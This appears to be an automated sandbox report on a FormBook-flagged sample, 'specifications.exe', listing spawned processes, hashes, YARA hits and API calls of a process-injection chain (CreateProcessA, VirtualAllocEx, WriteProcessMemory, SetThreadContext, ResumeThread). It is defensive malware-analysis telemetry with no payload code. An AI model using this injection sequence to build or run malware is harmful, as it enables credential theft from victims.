                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\specifications.exe"
                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                File size:882'688 bytes
                                                                                                                                                                                MD5 hash:8F233B98037A9F801C3977AFE32776A6
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:03:15:30
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe"
                                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:03:15:31
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\SearchProtocolHost.exe"
                                                                                                                                                                                Imagebase:0xf60000
                                                                                                                                                                                File size:340'992 bytes
                                                                                                                                                                                MD5 hash:727FE964E574EEAF8917308FFF0880DE
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:03:15:44
                                                                                                                                                                                Start date:29/11/2024
                                                                                                                                                                                Path:C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe"
                                                                                                                                                                                Imagebase:0xd50000
                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

Target ID: 9
Start time: 03:15:56
Start date: 29/11/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff6bf500000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Execution Graph

Execution Coverage: 11.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 240
Total number of Limit Nodes: 11


Control-flow Graph (first block a399070-a399092; API call: PostMessageW)
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa$4-xa$56
                                                                                                                                                                                  • API String ID: 410705778-1661249417
                                                                                                                                                                                  • Opcode ID: 2eadf942892072e43abdc73f857c3fd89fa905556444ef4fc152fa70d5f20f1d
                                                                                                                                                                                  • Instruction ID: a492620c1949850a68dfb64ef038d278dfdf52e92a0e78f50f037cfe78781cf7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2eadf942892072e43abdc73f857c3fd89fa905556444ef4fc152fa70d5f20f1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A6B1EA768083889FDF11CFA8C895BDABFF4EF4A210F15448AE580AB262C7745445CFA1

Control-flow Graph (first block a39c814-a39c8b5; API call: CreateProcessA)
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A39CA56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID: 4-xa$4-xa
                                                                                                                                                                                  • API String ID: 963392458-1296441845
                                                                                                                                                                                  • Opcode ID: f4ccbc109d226a8f4230628efb56e1fbf1d5cf83e34a9fab85673baae64bed5b
                                                                                                                                                                                  • Instruction ID: 08da614cf9cb820a0ada9cd53d55b15f06bd70b85abcff35df8405fa9ad17fcc
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4ccbc109d226a8f4230628efb56e1fbf1d5cf83e34a9fab85673baae64bed5b
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBA18C71D10219DFDF20DF68C881BEEBBB2BF48314F1481AAE849A7240DB749985CF91

Control-flow Graph (first block a39c820-a39c8b5; API call: CreateProcessA)
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A39CA56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                  • String ID: 4-xa$4-xa
                                                                                                                                                                                  • API String ID: 963392458-1296441845
                                                                                                                                                                                  • Opcode ID: 8aca8e2a7cde27c3e08dde67a889fb4ffa2ab67c771568d822c73df7a698831c
                                                                                                                                                                                  • Instruction ID: ce3bf367ea02198ebdcd2649a23e568cc16152d69b0a874ce978395f8111a77d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aca8e2a7cde27c3e08dde67a889fb4ffa2ab67c771568d822c73df7a698831c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C916C71D10219DFDF24DF69C841BEEBBB2BF48314F1491AAE809A7240DB749985CF91

Control-flow Graph (first block 2fee510-2fee51f; API call: GetModuleHandleW)
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4139908857-3016476521
                                                                                                                                                                                  • Opcode ID: 65de429cdb515cf241914bca496c43a97f904b2a89c50865177ee6aa6f3a1c0e
                                                                                                                                                                                  • Instruction ID: 756bccf4e1a2f5faa9d0c9bbc10effd11b27cedce9467a89ce6dc7a7583880e8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 65de429cdb515cf241914bca496c43a97f904b2a89c50865177ee6aa6f3a1c0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA7142B0A00B058FDB25DF29D54475ABBF2BF88354F00892DD68AD7A50EB34E949CF91

Control-flow Graph (first block 2fe9104-2fe910e; API call: CreateActCtxA)
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02FE91C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2289755597-3016476521
                                                                                                                                                                                  • Opcode ID: 17c934c5de0b748caa171dc46cc1c1d8a3ea619044885cfc41bcc56482f0af19
                                                                                                                                                                                  • Instruction ID: d75b97108b3318db37c4ec08f10094f484d022701be8b85bcb4d8507c266e8cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17c934c5de0b748caa171dc46cc1c1d8a3ea619044885cfc41bcc56482f0af19
                                                                                                                                                                                  • Instruction Fuzzy Hash: D841D0B0C00619CEDF25CFA9C944BCEBBF6BF49704F20806AD419AB251DBB56945CFA1

Control-flow Graph (first block 2fe7ccc-2fe91d1; API call: CreateActCtxA)
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02FE91C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2289755597-3016476521

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0A0AAA1D,?,?), ref: 0A0AAACF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DrawText
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2175133113-3016476521

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A39C628
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 3559483778-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0A0AAA1D,?,?), ref: 0A0AAACF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745056349.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a0a0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DrawText
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 2175133113-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A39C628
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 3559483778-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A39C47E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 983334009-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A39C708
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 1726664587-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A39C708
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 1726664587-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A39C47E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 983334009-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A39C546
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4275171209-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A39C546
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4275171209-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0A39BF7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 947044025-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02FEE52C), ref: 02FEE766
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 4139908857-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0A39BF7A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 947044025-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 410705778-3016476521
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A39EB85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                                                  • String ID: 4-xa
                                                                                                                                                                                  • API String ID: 410705778-3016476521
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction ID: 27dcb79649bbcd8619edbf8579e3297445fe5bee244fea312d1e27af6fe86c4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF11BE79504240DFDB12CF54C5C0B15BB62FB84324F24C6AEDA498B656C33AE44ACB91
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction ID: 7714d43cf2c58c86d3ce1d57c6f63d52bddb0f6ac3ac01a02faf485276cf6a12
                                                                                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2311BB75504280CFDB16CF58D5C4B15FBA2FB84314F24C6AEDA098B656C33AD54ACBA2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b629bde1a547f90c2049de5e1fb23786abb349124b9c3173085d33a80b873f4c
                                                                                                                                                                                  • Instruction ID: e3660febf30c6228e93d73b1b5a2d3922ece0faf3f0323d57456afad87bff01f
                                                                                                                                                                                  • Opcode Fuzzy Hash: b629bde1a547f90c2049de5e1fb23786abb349124b9c3173085d33a80b873f4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 55012B710493849AE7104FA9CDC8B66FFD8DF42324F08C61AED198A282D6399948C671
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fd901fbd79eef2e76914b0bc569e1240a00f5cc46e011ad8e2153451381bcaee
                                                                                                                                                                                  • Instruction ID: 0a66033f10e856855005436f6e60904b0b638530891fd8006f82c3b07854358f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd901fbd79eef2e76914b0bc569e1240a00f5cc46e011ad8e2153451381bcaee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0C2714043809AE7108F1ACDC8B62FFD8EB41334F18C55AED084A287C2799944CBB0
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                                                                                                                  • API String ID: 0-2688501482
                                                                                                                                                                                  • Opcode ID: 27039d5b1ffc0314076b53c1379c85ba053c6dfa3020ea61d8cc82f14146da85
                                                                                                                                                                                  • Instruction ID: 50b541655e1acd746be764ee31e197134aa8d7d78a1c5425fc8b116bb456626c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27039d5b1ffc0314076b53c1379c85ba053c6dfa3020ea61d8cc82f14146da85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB2B175E00628DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TJkq$Tefq$xbiq
                                                                                                                                                                                  • API String ID: 0-2501753584
                                                                                                                                                                                  • Opcode ID: 2461d8ced2ff72c997bddcaeab9c76cc1306758e648bcbc468427810b80fcac3
                                                                                                                                                                                  • Instruction ID: 233c4c657a1877c09f13dc0ba958c78b5be11dc41d25e65cad20bdc3a8273a25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2461d8ced2ff72c997bddcaeab9c76cc1306758e648bcbc468427810b80fcac3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C1A375E016588FDB59CF6AC9846D9BBF2AF89300F14C0EAD809AB365DB305E85CF50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @C7$gYZW
                                                                                                                                                                                  • API String ID: 0-391137493
